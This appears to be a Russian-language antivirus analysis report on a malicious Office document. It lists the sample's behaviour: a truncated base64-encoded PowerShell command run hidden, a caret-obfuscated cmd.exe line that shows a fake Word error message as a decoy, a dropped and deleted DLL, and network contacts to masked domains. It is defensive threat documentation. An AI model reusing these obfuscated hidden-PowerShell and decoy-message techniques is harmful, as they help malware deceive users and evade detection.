Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\c3re5c3\di_p3c9\o_5z.dll
Удаляет следующие файлы
- %HOMEPATH%\c3re5c3\di_p3c9\o_5z.dll
Сетевая активность
Подключается к
- 'hu###omains.com':443
- 'wa#.##onglisc.com':80
- 'fn##q.com':443
- 'sa######aninarijeevika.com':443
- 'so##nap.com':443
TCP
Другие
- 'hu###omains.com':443
- 'sa######aninarijeevika.com':443
- 'so##nap.com':443
UDP
- DNS ASK pe###ilm.com
- DNS ASK hu###omains.com
- DNS ASK gi#####hanksdaily.com
- DNS ASK wa#.##onglisc.com
- DNS ASK fn##q.com
- DNS ASK sa######aninarijeevika.com
- DNS ASK zi#####.teleskopstore.com
- DNS ASK so##nap.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAM...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
